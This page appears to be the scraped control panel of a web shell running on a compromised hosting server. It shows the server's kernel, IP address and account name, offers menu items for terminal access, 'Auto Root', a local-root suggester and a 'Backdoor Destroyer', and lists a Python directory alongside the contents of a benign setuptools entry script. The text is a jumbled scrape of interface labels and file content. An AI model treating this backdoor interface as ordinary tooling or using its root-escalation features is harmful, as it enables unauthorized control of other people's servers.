Linux ams-business-8.hostwindsdns.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
LiteSpeed
Server IP : 192.236.177.161 & Your IP : 216.73.216.154
Domains :
Cant Read [ /etc/named.conf ]
User : ajzdfbpz
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
python38 /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
chardetect
977
B
-rwxr-xr-x
2024-05-30 15:24
distro
966
B
-rwxr-xr-x
2024-05-30 15:34
pbr
164
B
-rwxr-xr-x
2020-07-10 12:13
pw_migrate
422
B
-rwxr-xr-x
2020-07-10 16:39
pwiz
6.8
KB
-rwxr-xr-x
2020-11-18 21:49
pydoc3
91
B
-rwxr-xr-x
2024-09-23 11:26
pydoc3.8
91
B
-rwxr-xr-x
2024-09-23 11:26
python3
7.57
KB
-rwxr-xr-x
2024-09-23 11:26
python3.8
7.57
KB
-rwxr-xr-x
2024-09-23 11:26
Save
Rename
#!/opt/alt/python38/bin/python3 # EASY-INSTALL-ENTRY-SCRIPT: 'distro==1.6.0','console_scripts','distro' import re import sys # for compatibility with easy_install; see #2198 __requires__ = 'distro==1.6.0' try: from importlib.metadata import distribution except ImportError: try: from importlib_metadata import distribution except ImportError: from pkg_resources import load_entry_point def importlib_load_entry_point(spec, group, name): dist_name, _, _ = spec.partition('==') matches = ( entry_point for entry_point in distribution(dist_name).entry_points if entry_point.group == group and entry_point.name == name ) return next(matches).load() globals().setdefault('load_entry_point', importlib_load_entry_point) if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(load_entry_point('distro==1.6.0', 'console_scripts', 'distro')())